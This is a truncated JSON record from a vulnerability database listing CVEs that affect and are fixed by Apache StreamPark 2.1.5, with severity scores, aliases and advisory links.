{"url":"http://public2.vulnerablecode.io/api/packages/69604?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.5","type":"maven","namespace":"org.apache.streampark","name":"streampark","version":"2.1.5","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":null,"latest_non_vulnerable_version":null,"affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/20407?format=json","vulnerability_id":"VCID-8bjy-8jm9-2bhu","summary":"Apache StreamPark contains an Incorrect Execution-Assigned Permissions vulnerability\nIncorrect Execution-Assigned Permissions vulnerability in Apache StreamPark. This issue affects Apache StreamPark: from 2.1.4 before 2.1.6. Users are recommended to upgrade to version 2.1.6, which fixes the issue. Version 2.1.6 has yet to be published in the Maven registry.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-30001","reference_id":"","reference_type":"","scores":[{"value":"0.00272","scoring_system":"epss","scoring_elements":"0.50834","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-30001"},{"reference_url":"https://github.com/apache/streampark","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/streampark"},{"reference_url":"https://lists.apache.org/thread/xfmsvhkcnr1831n0w5ovy3p44lsmfb7m","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-10-10T18:58:38Z/"}],"url":"https://lists.apache.org/thread/xfmsvhkcnr1831n0w5ovy3p44lsmfb7m"},{"reference_url":"http://www.openwall.com/lists/oss-security/2025/09/04/1","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://www.openwall.com/lists/oss-security/2025/09/04/1"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-30001","reference_id":"CVE-2025-30001","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-30001"},{"reference_url":"https://github.com/advisories/GHSA-6wwv-6mm3-pp76","reference_id":"GHSA-6wwv-6mm3-pp76","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6wwv-6mm3-pp76"}],"fixed_packages":[],"aliases":["CVE-2025-30001","GHSA-6wwv-6mm3-pp76"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8bjy-8jm9-2bhu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/21842?format=json","vulnerability_id":"VCID-9ssf-rvpt-suce","summary":"Apache StreamPark has a hard-coded encryption key\nIn Apache StreamPark versions 2.0.0 through 2.1.7, a security vulnerability involving a hard-coded encryption key exists. This vulnerability occurs because the system uses a fixed, immutable key for encryption instead of dynamically generating or securely configuring the key. Attackers may obtain this key through reverse engineering or code analysis, potentially decrypting sensitive data or forging encrypted information, leading to information disclosure or unauthorized system access.\n\nThis issue affects Apache StreamPark: from 2.0.0 before 2.1.7.\n\nUsers are recommended to upgrade to version 2.1.7, which fixes the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-54947","reference_id":"","reference_type":"","scores":[{"value":"0.00053","scoring_system":"epss","scoring_elements":"0.16836","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-54947"},{"reference_url":"https://github.com/apache/streampark","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/streampark"},{"reference_url":"https://github.com/apache/streampark/commit/39034db0c806168afa82e58e4f376e1e3c3b73e4","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/streampark/commit/39034db0c806168afa82e58e4f376e1e3c3b73e4"},{"reference_url":"https://lists.apache.org/thread/kdntmzyzrco75x9q6mc6s8lty1fxmog1","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-12T18:48:43Z/"}],"url":"https://lists.apache.org/thread/kdntmzyzrco75x9q6mc6s8lty1fxmog1"},{"reference_url":"http://www.openwall.com/lists/oss-security/2025/12/12/3","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://www.openwall.com/lists/oss-security/2025/12/12/3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-54947","reference_id":"CVE-2025-54947","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-54947"},{"reference_url":"https://github.com/advisories/GHSA-prv5-c2px-j9q3","reference_id":"GHSA-prv5-c2px-j9q3","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-prv5-c2px-j9q3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/71742?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.7","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.7"}],"aliases":["CVE-2025-54947","GHSA-prv5-c2px-j9q3"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9ssf-rvpt-suce"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/21843?format=json","vulnerability_id":"VCID-vpe1-chyd-q7cu","summary":"Apache StreamPark uses a Weak Encryption Algorithm\nWeak Encryption Algorithm in StreamPark, The use of an AES cipher in ECB mode and a weak random number generator for encrypting sensitive data, including JWT tokens, may have risked exposing sensitive authentication data\n\nThis issue affects Apache StreamPark: from 2.0.0 before 2.1.7.\n\nUsers are recommended to upgrade to version 2.1.7, which fixes the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-54981","reference_id":"","reference_type":"","scores":[{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.07432","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-54981"},{"reference_url":"https://github.com/apache/streampark","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/streampark"},{"reference_url":"https://github.com/apache/streampark/commit/39034db0c806168afa82e58e4f376e1e3c3b73e4","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/streampark/commit/39034db0c806168afa82e58e4f376e1e3c3b73e4"},{"reference_url":"https://lists.apache.org/thread/9rbvdvwg5fdhzjdgyrholgso53r26998","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-12T19:26:21Z/"}],"url":"https://lists.apache.org/thread/9rbvdvwg5fdhzjdgyrholgso53r26998"},{"reference_url":"http://www.openwall.com/lists/oss-security/2025/12/12/4","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://www.openwall.com/lists/oss-security/2025/12/12/4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-54981","reference_id":"CVE-2025-54981","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-54981"},{"reference_url":"https://github.com/advisories/GHSA-749j-2hp6-8cxm","reference_id":"GHSA-749j-2hp6-8cxm","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-749j-2hp6-8cxm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/71742?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.7","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.7"}],"aliases":["CVE-2025-54981","GHSA-749j-2hp6-8cxm"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vpe1-chyd-q7cu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/21835?format=json","vulnerability_id":"VCID-ztkm-usgz-hkdx","summary":"Apache StreamPark: Use the user’s password as the secret key Vulnerability\nWhen encrypting sensitive data, weak encryption keys that are fixed or directly generated based on user passwords are used. Attackers can obtain these keys through methods such as reverse engineering, code leaks, or password guessing, thereby decrypting stored or transmitted encrypted data, leading to the leakage of sensitive information.\n\nThis issue affects Apache StreamPark: from 2.0.0 before 2.1.7.\n\nUsers are recommended to upgrade to version 2.1.7, which fixes the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53960","reference_id":"","reference_type":"","scores":[{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.19254","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53960"},{"reference_url":"https://github.com/apache/streampark","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/streampark"},{"reference_url":"https://github.com/apache/streampark/commit/39034db0c806168afa82e58e4f376e1e3c3b73e4","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/streampark/commit/39034db0c806168afa82e58e4f376e1e3c3b73e4"},{"reference_url":"https://lists.apache.org/thread/xlpvfzf5l5m5mfyjwrz5h4dssm3c32vy","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-12T18:47:19Z/"}],"url":"https://lists.apache.org/thread/xlpvfzf5l5m5mfyjwrz5h4dssm3c32vy"},{"reference_url":"http://www.openwall.com/lists/oss-security/2025/12/04/1","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://www.openwall.com/lists/oss-security/2025/12/04/1"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53960","reference_id":"CVE-2025-53960","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53960"},{"reference_url":"https://github.com/advisories/GHSA-3hg2-rh4r-8qf6","reference_id":"GHSA-3hg2-rh4r-8qf6","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3hg2-rh4r-8qf6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/71742?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.7","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.7"}],"aliases":["CVE-2025-53960","GHSA-3hg2-rh4r-8qf6"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ztkm-usgz-hkdx"}],"fixing_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/251646?format=json","vulnerability_id":"VCID-3fqv-y3zq-fqgd","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-29178","reference_id":"","reference_type":"","scores":[{"value":"0.06649","scoring_system":"epss","scoring_elements":"0.91352","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-29178"},{"reference_url":"https://github.com/apache/streampark","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/streampark"},{"reference_url":"https://lists.apache.org/thread/n6dhnl68knpxy80t35qxkkw2691l8sfn","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-07-18T13:21:44Z/"}],"url":"https://lists.apache.org/thread/n6dhnl68knpxy80t35qxkkw2691l8sfn"},{"reference_url":"http://www.openwall.com/lists/oss-security/2024/07/18/1","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-07-18T13:21:44Z/"}],"url":"http://www.openwall.com/lists/oss-security/2024/07/18/1"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-29178","reference_id":"CVE-2024-29178","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-29178"},{"reference_url":"https://github.com/advisories/GHSA-vv8h-m63v-53pq","reference_id":"GHSA-vv8h-m63v-53pq","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vv8h-m63v-53pq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/82188?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.4"},{"url":"http://public2.vulnerablecode.io/api/packages/69604?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-8bjy-8jm9-2bhu"},{"vulnerability":"VCID-9ssf-rvpt-suce"},{"vulnerability":"VCID-vpe1-chyd-q7cu"},{"vulnerability":"VCID-ztkm-usgz-hkdx"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.5"}],"aliases":["CVE-2024-29178","GHSA-vv8h-m63v-53pq"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3fqv-y3zq-fqgd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/251785?format=json","vulnerability_id":"VCID-ct4f-rfw5-gfa4","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-29737","reference_id":"","reference_type":"","scores":[{"value":"0.00749","scoring_system":"epss","scoring_elements":"0.73426","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-29737"},{"reference_url":"https://github.com/apache/streampark","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/streampark"},{"reference_url":"https://lists.apache.org/thread/xhx7jt1t24s6d7o435wxng8t0ojfbfh5","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-07-18T15:08:55Z/"}],"url":"https://lists.apache.org/thread/xhx7jt1t24s6d7o435wxng8t0ojfbfh5"},{"reference_url":"http://www.openwall.com/lists/oss-security/2024/07/17/2","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-07-18T15:08:55Z/"}],"url":"http://www.openwall.com/lists/oss-security/2024/07/17/2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-29737","reference_id":"CVE-2024-29737","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-29737"},{"reference_url":"https://github.com/advisories/GHSA-5v69-92vw-fmjh","reference_id":"GHSA-5v69-92vw-fmjh","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5v69-92vw-fmjh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/82188?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.4"},{"url":"http://public2.vulnerablecode.io/api/packages/69604?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-8bjy-8jm9-2bhu"},{"vulnerability":"VCID-9ssf-rvpt-suce"},{"vulnerability":"VCID-vpe1-chyd-q7cu"},{"vulnerability":"VCID-ztkm-usgz-hkdx"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.5"}],"aliases":["CVE-2024-29737","GHSA-5v69-92vw-fmjh"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"7.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ct4f-rfw5-gfa4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/251596?format=json","vulnerability_id":"VCID-dm1g-1j1x-wkh9","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-29120","reference_id":"","reference_type":"","scores":[{"value":"0.0008","scoring_system":"epss","scoring_elements":"0.2358","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-29120"},{"reference_url":"https://github.com/apache/incubator-streampark","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/incubator-streampark"},{"reference_url":"https://lists.apache.org/thread/y3oqz7l8vd7jxxx3z2khgl625nvfr60j","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-17T18:16:06Z/"}],"url":"https://lists.apache.org/thread/y3oqz7l8vd7jxxx3z2khgl625nvfr60j"},{"reference_url":"http://www.openwall.com/lists/oss-security/2024/07/17/4","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-17T18:16:06Z/"}],"url":"http://www.openwall.com/lists/oss-security/2024/07/17/4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-29120","reference_id":"CVE-2024-29120","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-29120"},{"reference_url":"https://github.com/advisories/GHSA-hcf8-5j78-887v","reference_id":"GHSA-hcf8-5j78-887v","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hcf8-5j78-887v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/82188?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.4"},{"url":"http://public2.vulnerablecode.io/api/packages/69604?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-8bjy-8jm9-2bhu"},{"vulnerability":"VCID-9ssf-rvpt-suce"},{"vulnerability":"VCID-vpe1-chyd-q7cu"},{"vulnerability":"VCID-ztkm-usgz-hkdx"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.5"}],"aliases":["CVE-2024-29120","GHSA-hcf8-5j78-887v"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dm1g-1j1x-wkh9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19096?format=json","vulnerability_id":"VCID-pxce-7c8m-euce","summary":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')\nIn the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The sql syntax :select * from table where jobName like '%jobName%'. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage.\n\nMitigation:\n\nUsers are recommended to upgrade to version 2.1.2, which fixes the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-30867","reference_id":"","reference_type":"","scores":[{"value":"0.00402","scoring_system":"epss","scoring_elements":"0.61106","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-30867"},{"reference_url":"https://github.com/apache/incubator-streampark","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/incubator-streampark"},{"reference_url":"https://lists.apache.org/thread/bhdzh6hnh04yyf3g203bbyvxryd720o2","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread/bhdzh6hnh04yyf3g203bbyvxryd720o2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-30867","reference_id":"CVE-2023-30867","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/